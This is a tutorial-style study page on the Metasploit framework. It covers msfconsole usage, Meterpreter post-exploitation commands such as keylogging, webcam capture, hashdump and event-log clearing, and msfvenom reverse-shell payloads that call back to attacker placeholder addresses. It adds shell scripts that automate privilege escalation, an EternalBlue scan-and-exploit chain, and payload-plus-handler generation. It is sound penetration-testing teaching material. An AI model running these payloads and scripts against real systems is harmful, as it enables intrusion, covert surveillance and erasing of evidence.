Metasploit


Metasploit is by far the most popular exploitation framework in the industry.
Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.

  • It was created by the security researcher H. D. Moore and acquired by Rapid7 in 2009.
  • There are two versions of Metasploit:
    • Metasploit Framework: The open-source community (free) version that works from the command line.
    • Metasploit Pro: The commercial version that adds task automation and management, with a graphical user interface (GUI).
  • Metasploit is written in Ruby and built around a modular architecture.
  • Metasploit is installed in /usr/share/metasploit-framework by default in Kali Linux. All corresponding files, modules, documentation, and scripts are located in that folder.

The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.

The main components of the Metasploit Framework can be summarized as follows:

  • msfconsole: The main command-line interface.
  • Modules: supporting modules such as exploits, scanners, payloads, etc.
  • Tools: Stand-alone tools that help with vulnerability research, vulnerability assessment, or penetration testing, such as msfvenom, pattern_create and pattern_offset.
Usage:

You can launch the Metasploit console by using the msfconsole command.

  • msfconsole
  • search [service/vuln]
  • use [exploit name or its number from the search results]
  • set RHOSTS [ip of victim]
  • options (or show options) to see the current configuration
  • show targets
  • run or exploit
  • to change payloads
    • set payload [name]

Modules#

Modules are small components within the Metasploit framework that are built to perform a specific task, such as exploiting a vulnerability, scanning a target, or performing a brute-force attack.
Metasploit has several modules:

  • Auxiliary: Any supporting module, such as scanners, crawlers and fuzzers.
  • Encoders: Transform the payload, originally to remove bad characters (such as null bytes) that would break an exploit. Encoding was once also used to slip past signature-based antivirus; today's engines detect the common encoders such as shikata_ga_nai, so do not count on it for evasion.
  • Evasion: Modules that generate payloads specifically built to evade antivirus software.
  • Exploits: Exploit modules, organized by target platform and service.
  • Nops: NOPs (No OPeration) do nothing, literally. On the Intel x86 family a NOP is the single byte 0x90, which the CPU executes without side effects. Runs of them (NOP sleds) let an imprecise jump slide into the payload, and they are also used as padding to keep payload sizes consistent.
  • Payloads: The code that runs on the target system after exploitation.
  • Post: Post-exploitation modules that work through an existing session.

You will see four different directories under payloads: adapters, singles, stagers and stages.

  • Adapters: An adapter wraps single payloads to convert them into different formats. For example, a normal single payload can be wrapped inside a PowerShell adapter, producing a single PowerShell command that executes the payload.
  • Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
  • Stagers: Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads. “Staged payloads” will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small compared to the full payload sent at once.
  • Stages: Downloaded by the stager. This will allow you to use larger sized payloads.

Payload Types:

  • Non-staged (single, also called inline)
    • The whole payload is sent in one piece, so it is self-contained.
    • Larger, so it may not fit in the space an exploit gives you.
    • eg: windows/meterpreter_reverse_tcp
  • Staged
    • A small stager is sent first; it connects back to Metasploit and fetches the rest of the payload (the stage).
    • Fits into tight exploit buffers, but can be less reliable because the stage must be fetched over the network, and the handler must be configured with the same payload name so it serves the right stage.
    • eg: windows/meterpreter/reverse_tcp

Metasploit's naming convention tells the two apart: the stage and the stager are joined by _ in an inline (single) payload (shell_reverse_tcp, meterpreter_reverse_tcp) and separated by / in a staged payload (shell/reverse_tcp, meterpreter/reverse_tcp).

Msfconsole#

msfconsole will be your main interface to the Metasploit Framework.

  • You can launch it using the msfconsole command.
  • The Metasploit console (msfconsole) can be used just like a regular command-line shell (i.e., we can use ls, ping, help, clear, history etc).
  • It also supports tab completion.
  • Msfconsole is managed by context; this means that unless set as a global variable, all parameter settings will be lost if you change the module you have decided to use.
  • use
    • We can select the module we want to use by this command.
    • The module to be used can also be selected with the use command followed by the number at the beginning of the search result line.
    • eg: use exploit/windows/smb/ms17_010_eternalblue
      • You will see the command line prompt change from msf6 to msf6 exploit(windows/smb/ms17_010_eternalblue). The prompt tells us we now have a context set in which we will work.
      • You can leave the context using the back command.
  • show
    • show options prints the options of the module you have selected. Its output depends on the context it is used in.
    • The show command can be used in any context followed by a module type (auxiliary, payload, exploit, etc.) to list the available modules of that type; inside an exploit context, show payloads lists only the payloads compatible with that exploit.
    • From the msfconsole prompt, show all lists every module (a very long list).
  • info
    • This will display detailed information on the module such as its author, relevant sources, etc.
    • You can use the info command followed by the module’s path from the msfconsole prompt (e.g. info exploit/windows/smb/ms17_010_eternalblue).
    • Or also by typing the info command within a module’s context.
  • search
    • This command will search the Metasploit Framework database for modules relevant to the given search parameter.
    • You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system.
    • The output of the search command provides an overview of each returned module. You may notice the “name” column already gives more information than just the module name. You can see the type of module (auxiliary, exploit, etc.) and the category of the module (scanner, admin, windows, Unix, etc.). You can use any module returned in a search result with the command use followed by the number at the beginning of the result line.
    • Another essential piece of information is the "rank" column. Exploits are rated by reliability and impact on the target, from Excellent (should never crash the service, e.g. command injection) down to Manual (unstable or requiring user interaction, close to a denial of service); see the Metasploit exploit ranking documentation.
    • You can direct the search function using keywords such as type and platform. (eg: search type:auxiliary telnet)
  • set
    • After entering the context of a module, you need to set parameters. Based on the module you use, additional or different parameters may need to be set. It is good practice to use the show options command to list the required parameters.
    • All parameters are set using the command syntax: set PARAMETER_NAME VALUE.
    • Parameters you will often use are:
      • RHOSTS: “Remote host”, the IP address of the target system. A single IP address or a network range can be set. This will support the CIDR (Classless Inter-Domain Routing) notation (/24, /16, etc.) or a network range (10.10.10.x – 10.10.10.y). You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt.
      • RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
      • PAYLOAD: The payload you will use with the exploit.
      • LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP address.
      • LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine, and you can set it to any port not used by any other application.
      • SESSION: Each connection established to the target system using Metasploit will have a session ID. You will use this with post-exploitation modules that will connect to the target system using an existing connection.
    • You can override any set parameter using the set command again with a different value. You can also clear any parameter value using the unset PARAMETER_NAME command or clear all set parameters with the unset all command.
    • You can use the setg command to set values that will be used for all modules (sets a global value). You can clear any value set with setg using unsetg.
  • exploit
    • Once all module parameters are set, you can launch the module using the exploit command.
    • Metasploit also supports the run command, which is an alias created for the exploit command as the word exploit did not make sense when using modules that were not exploits (port scanners, vulnerability scanners, etc.).
    • The exploit command can be used without any parameters or using the “-z” parameter.
    • The exploit -z command will run the exploit and background the session as soon as it opens. This will return you the context prompt from which you have run the exploit.
    • Some modules implement the check command. Running check tests whether the target is vulnerable without exploiting it; the result is reported as Vulnerable, Appears, Safe, Unknown or Unsupported.

Scanning#

Metasploit has a number of modules to scan open ports on the target system and network. (eg: auxiliary/scanner/portscan/tcp)

  • You can list potential port scanning modules available using the search portscan command.
  • You can also directly perform Nmap scans from the msfconsole prompt.
  • The scanner/discovery/udp_sweep module will allow you to quickly identify services running over UDP. It does not scan every possible UDP service but gives a quick way to identify services such as DNS or NetBIOS.
  • Metasploit offers several auxiliary modules that scan specific services, eg: for SMB, scanner/smb/smb_enumshares and scanner/smb/smb_version.

Exploitation#

You can search for exploits using the search command, obtain more information about an exploit using info, and launch it using exploit.
Most exploits have a preset default payload. Use show payloads to list the other payloads compatible with that specific exploit. Some payloads add parameters that you then need to set (eg: LHOST and LPORT for reverse shells).

  • Select the payload with set payload followed by the payload name or its index in the show payloads output.

Sessions#

Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit.

  • The sessions command can be used from the msfconsole prompt or any context to see the existing sessions.
  • To interact with any session, you can use the sessions -i command followed by the desired session number.
  • You can use the background command to background the session prompt and go back to the msfconsole prompt. Alternatively, CTRL+Z can be used to background sessions.
  • When running post-exploitation modules, you can set session to use as set SESSION SESSION_ID

Meterpreter#

Meterpreter is an advanced Metasploit payload: it can be delivered over bind or reverse connections and provides a large set of post-exploitation commands.

  • Meterpreter runs on the target system and acts as an agent in a command-and-control architecture. You interact with the target operating system and files through Meterpreter's specialized commands.
  • When delivered by an exploit, Meterpreter is injected straight into memory and does not write itself to disk, which is meant to sidestep file-based antivirus scans. It lives inside whatever host process it was injected into (or later migrated to), so it shows up as that process rather than as a separate executable. A stand-alone msfvenom executable is, of course, a file on disk.
  • Meterpreter also tries to avoid network IDS/IPS detection by encrypting its traffic to the Metasploit server (TLS for the HTTPS transports, and its own packet encryption over plain TCP). Its default TLS certificate and traffic patterns are well known to detection vendors, so treat this as a baseline, not as stealth.
  • Meterpreter payload for a bind TCP connection (after exploitation) being set: set payload windows/x64/meterpreter/bind_tcp

Commands are built-in tools available on Meterpreter. They will run on the target system without loading any additional script or executable files.
Meterpreter will provide you with three primary categories of tools:

  • Built-in commands
  • Meterpreter tools
  • Meterpreter scripting

Common Meterpreter commands#

Typing help in any Meterpreter session lists the available commands. The set differs between Meterpreter flavours (Windows, Linux, PHP, Python, etc.) and grows as extensions are loaded.

Meterpreter Command           Description
cat, cd, pwd, ls, rm          Same as on Linux/Unix systems, but operating on the victim's file system.
lpwd, lcd                     Display and change the local directory (on the attacking system).
exit                          Terminate the Meterpreter session.
search                        Locate files on the victim system.
download                      Download a file from the victim system.
upload                        Upload a file to the victim system.
edit                          Open and edit a file on the victim system with vim.
ipconfig                      Display the network interface configuration and IP addresses of the victim system.
arp                           Display the host ARP cache.
netstat                       Display the network connections.
route                         View and modify the routing table.
portfwd                       Forward a local port to a remote service.
getuid                        Display the user Meterpreter is running as on the compromised system.
getpid                        Return the process ID Meterpreter is running in.
sysinfo                       Display the operating system, computer name, architecture and Meterpreter type.
idletime                      Display the number of seconds the user at the victim system has been idle.
ps                            List running processes on the victim system.
execute                       Run a program on the victim system.
run                           Execute a Meterpreter script or post module.
kill, pkill                   Terminate a process.
shell                         Drop into a standard shell on the victim system.
shutdown, reboot              Shut down or reboot the computer.
load                          Load one or more Meterpreter extensions (eg: python, kiwi).
sessions                      Quickly switch to another session.
resource                      Execute Meterpreter commands listed in a text file, which helps accelerate repetitive actions.
keyscan_dump                  Dump the keystroke buffer.
keyscan_start, keyscan_stop   Start or stop capturing keystrokes.
webcam_chat                   Start a video chat.
record_mic                    Record audio from the default microphone for X seconds.
webcam_list                   List all webcams on the victim system.
webcam_snap                   Take a snapshot (picture) using a webcam of the victim system.
webcam_stream                 Play a video stream from the specified webcam.
screenshot                    Capture a screenshot of the target's desktop.
screenshare                   Watch the remote user's desktop in real time.
hashdump                      Dump the contents of the SAM database on a Windows system (requires SYSTEM privileges).
clearev                       Clear the Application, System and Security event logs on a Windows system. Noisy: Windows records the clearing itself (Security event 1102).
getsystem                     Attempt to elevate privileges to the local SYSTEM account on a Windows target.
migrate                       Migrate to a different process on the victim system.
background, bg                Background the current session.

Migrating to another process#

Migrating moves the Meterpreter agent into another process on the target.

  • For example, if you see a word processor running on the target (e.g. winword.exe, notepad.exe, etc.), you can migrate into it and start capturing the keystrokes the user sends to that process.
  • Meterpreter's keyscan_start, keyscan_stop and keyscan_dump commands make it act as a keylogger for the process it currently lives in.
  • Migrating to a long-lived process (one the user is unlikely to close) also gives you a more stable Meterpreter session than staying in the exploited service or a short-lived launcher.
  • getsystem elevates by impersonating a SYSTEM token in Meterpreter's own thread; the host process still runs as the original user. For actions that need a genuinely SYSTEM-owned process, migrate into one that already runs as NT AUTHORITY\SYSTEM.
  • To migrate, type migrate followed by the PID of the target process: migrate PID. You need sufficient rights over the target process, and a protected or exiting process will refuse the injection.
  • Migration can fail and may take several attempts. If it keeps failing, choose another process or re-run the shell-to-Meterpreter upgrade to obtain a fresh session; in a lab, rebooting the target and starting over is the last resort.
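The routine above (check who you are, get SYSTEM, move into a SYSTEM process, verify) as a Meterpreter resource file. This is an added example, not code from the original page or from Metasploit itself; winlogon.exe is an assumed target chosen because it runs as SYSTEM on every Windows host, and you should replace it with whatever ps shows on your target. The shell function only emits the script so it can be checked without a live session.

```shell
#!/bin/sh
# Added example, not from the original page: a Meterpreter resource file for
# the "get SYSTEM, then migrate" routine. winlogon.exe is an assumed target.

post_rc() {
    cat <<'EOF'
# who and where are we right now?
getuid
getpid
sysinfo
# elevate the token; getuid afterwards should report NT AUTHORITY\SYSTEM
getsystem
getuid
# list the candidate process first (-S filters ps output by name)
ps -S winlogon
# move the agent into winlogon.exe (assumed target); -N migrates by process name
migrate -N winlogon.exe
# the new PID and user confirm where we ended up
getpid
getuid
EOF
}

# Usage: post_rc > post.rc, then from the session:  meterpreter > resource /path/to/post.rc
post_rc
```

The script runs top to bottom with no branching, so if getsystem fails the migrate line still executes under the original user and will usually be refused; read the output rather than assuming the final getuid says SYSTEM.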

Convert a normal shell to meterpreter shell#

  • Quick upgrade using sessions -u:
    • If you are already interacting with the shell session, press Ctrl + Z to return to the msf> prompt. Type Y if prompted to background the session.
    • While in the msfconsole, check your active shells by running: sessions -l
    • Upgrade the session with the command: sessions -u <ID>
    • Metasploit will create a new session ID. Once the payload connects, view the sessions again and connect using: sessions -i <NEW_ID>
  • Using the module post/multi/manage/shell_to_meterpreter
    • Background the current shell to exit to msfconsole and run use post/multi/manage/shell_to_meterpreter
    • Set SESSION, LHOST and run.
    • The module will automatically spin up a listener and upgrade your standard shell to a fully featured Meterpreter shell.

Metasploit Database#

Metasploit has a database function to simplify project management and avoid confusion when setting parameter values.
It uses a PostgreSQL database to store hosts, services, credentials and loot, and to cache module metadata so that search is fast.

  1. Start the PostgreSQL service before using the database: service postgresql start or systemctl start postgresql
  2. Create and initialize the Metasploit database with msfdb init. On Kali run it with sudo; it creates the msf database and user and writes the connection details to ~/.msf4/database.yml. It can also be run as the postgres account: sudo -u postgres msfdb init.
  3. Check the database status with the db_status command in msfconsole.

The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be in the default workspace.

  • You can list available workspaces using the workspace command.
  • You can add a workspace using the -a parameter or delete a workspace using the -d parameter.
  • You can use the workspace command to navigate between workspaces simply by typing workspace followed by the desired workspace name.

Some database backend commands become available when Metasploit is launched with a database connected.

  • If you run a Nmap scan using the db_nmap, all results will be saved to the database.
  • You can now reach information relevant to hosts and services running on target systems with the hosts and services commands, respectively.
  • Once host information is stored in the database, hosts -R sets RHOSTS to every stored host (for the active module, or globally if no module is selected).
  • The services command used with the -S parameter will allow you to search for specific services in the environment.
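The msfconsole, scanning and database commands described on this page chained into one resource script, so the sequence workspace, db_nmap, services -R, setg, check, exploit -z runs without retyping. This is an added example, not code from the original page or from Metasploit; the subnet, attacker IP, port and the chosen target are placeholders, and the module and payload names are the ones already shown on the page. The shell function only prints the script so it can be checked without Metasploit installed.

```shell
#!/bin/sh
# Added example, not from the original page: a resource script for the
# scan-then-exploit workflow. All addresses and ports are placeholders.
#
# One-time setup on Kali, done before this script (not repeated inside it):
#   sudo systemctl start postgresql && sudo msfdb init

# Emit the script. Parameters: WORKSPACE RANGE LHOST LPORT TARGET.
# TARGET is the single host you decide to exploit after reading the scan
# results: a resource script does not branch on the outcome of "check",
# so that decision stays manual.
lab_rc() {
    cat <<EOF
db_status
workspace -a $1
# db_nmap stores hosts and services in the current workspace
db_nmap -sV -p 139,445 $2
hosts
services -p 445 -S smb
# globals survive a "use"; module-scoped "set" values do not
setg LHOST $3
setg LPORT $4
use auxiliary/scanner/smb/smb_version
# take RHOSTS from the stored services instead of retyping addresses
services -p 445 -R
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show options
# confirm the host is vulnerable before firing; this exploit can crash the target
check
# -z backgrounds the session as soon as it opens
exploit -z
sessions -l
EOF
}

# Usage:  lab_rc lab 10.10.10.0/24 10.10.14.5 4444 10.10.10.5 > lab.rc
#         msfconsole -q -r lab.rc
lab_rc lab 10.10.10.0/24 10.10.14.5 4444 10.10.10.5
```

Run it once with the exploit lines removed to populate the workspace, read the smb_version output, then run the full script against the host you picked. Because LHOST and LPORT are set with setg, they survive the switch from the scanner module to the exploit module.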

MSFvenom#

Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.

  • Msfvenom gives you access to every payload in the Metasploit Framework.
  • Msfvenom can create payloads in many formats (PHP, exe, dll, elf, etc.) and for many target systems (Apple, Windows, Android, Linux, etc.). List the available payloads with:
    msfvenom -l payloads

You can either generate stand-alone payloads (e.g. a Windows executable for Meterpreter) or get a usable raw format (e.g. python). The msfvenom --list formats command lists the supported output formats.

Encoding#

Payloads can be run through one of the encoder modules with the -e parameter (list them with msfvenom -l encoders; the encoder must match the payload's architecture or format). Encoding removes bad characters; it is not a reliable way past modern antivirus.
eg: Generating a PHP payload, here the PHP version of Meterpreter is encoded in Base64, and the output format set to raw.

    msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64

Handlers#

Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSFvenom payload. When using an exploit module, this part is automatically handled by the exploit module. 
Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be easily caught using a handler.

We can use Multi Handler to receive the incoming connections.

  • The module can be used with the use exploit/multi/handler command.
  • Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.
  • To use the module, we will need to set the payload value (eg: php/reverse_php), the LHOST, and LPORT values.
  • Once everything is set, we will run the handler and wait for the incoming connection.
  • When the reverse shell is triggered, the connection will be received by multi/handler and provide us with a shell.
  • If the payload was set as Meterpreter (e.g. in a Windows executable format), multi/handler would then provide us with a Meterpreter shell.

Based on the target system's configuration (operating system, installed web server, installed interpreter, etc.), msfvenom can create payloads in almost any format. Below are a few examples you will often use:

  • Linux Executable and Linkable Format (elf)
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
    The .elf format is comparable to the .exe format in Windows: an executable file for Linux. You may still need to give it executable permissions on the target. For example, once rev_shell.elf is on the target machine, run chmod +x rev_shell.elf, then start it with ./rev_shell.elf.
  • Windows
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
  • PHP
    msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
    The raw output has its opening <?php tag commented out and no closing ?> tag; edit the file so the opening tag is active before uploading it, otherwise the web server serves it as text instead of running it.
  • ASP
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
  • Python
    msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
    Note that cmd/unix/reverse_python produces a shell one-liner (python -c "..."), not a Python source file, so paste it into a shell on the target rather than running it with python rev_shell.py.
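The msfvenom and multi/handler steps above generated from one set of values, so that the handler's PAYLOAD, LHOST and LPORT cannot drift from what was baked into the binary (a mismatch between the two is the usual reason a callback never arrives). This is an added example, not code from the original page or from Metasploit; the IP, port and file names are placeholders. It also implements the page's staged-versus-inline naming rule (/ vs _), and generalizes it slightly by treating any stage component such as shell, meterpreter or vncinject the same way.

```shell
#!/bin/sh
# Added example, not from the original page: pair an msfvenom payload with a
# matching exploit/multi/handler resource script. Addresses are placeholders.

# Staged or inline, from the naming rule on the page: in a staged payload the
# stage (meterpreter, shell, ...) is its own path component and the stager
# (reverse_tcp, bind_tcp, ...) follows a "/"; inline payloads join them with "_".
payload_kind() {
    stage=${1%/*}            # drop the last component (the stager) ...
    stage=${stage##*/}       # ... and keep the component just before it
    case "$stage" in
        meterpreter|shell|vncinject|dllinject|upexec) echo staged ;;
        *) echo inline ;;
    esac
}

# msfvenom command line for PAYLOAD LHOST LPORT FORMAT OUTFILE.
# -o writes the file directly, so a failed run does not leave an empty file
# behind the way "> file" redirection would.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$1" "$2" "$3" "$4" "$5"
}

# Handler resource script for PAYLOAD LHOST LPORT. ExitOnSession false keeps
# listening after the first callback; "exploit -j -z" runs the handler as a
# background job without attaching to the session when it arrives.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# Example: Windows x64 Meterpreter executable plus its handler (assumed values).
main() {
    p=windows/x64/meterpreter/reverse_tcp
    lh=10.10.14.5
    lp=4444
    echo "# $p is a $(payload_kind "$p") payload"
    venom_cmd "$p" "$lh" "$lp" exe rev_shell.exe
    echo "# save the following as handler.rc and start it with: msfconsole -q -r handler.rc"
    handler_rc "$p" "$lh" "$lp"
}
main
```

The handler must be started before the payload runs on the target, and the payload name passed to set PAYLOAD has to be identical to the one given to msfvenom -p: for a staged payload the handler serves the second stage, and a handler configured for windows/meterpreter/reverse_tcp will not correctly serve an x64 stager, nor will it understand an inline meterpreter_reverse_tcp callback.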

Resources#

Metasploit
https://nahil.xyz/vault/tools/metasploit/
Author Nahil Rasheed
Published at June 3, 2026
Disclaimer This content is provided strictly for educational purposes only.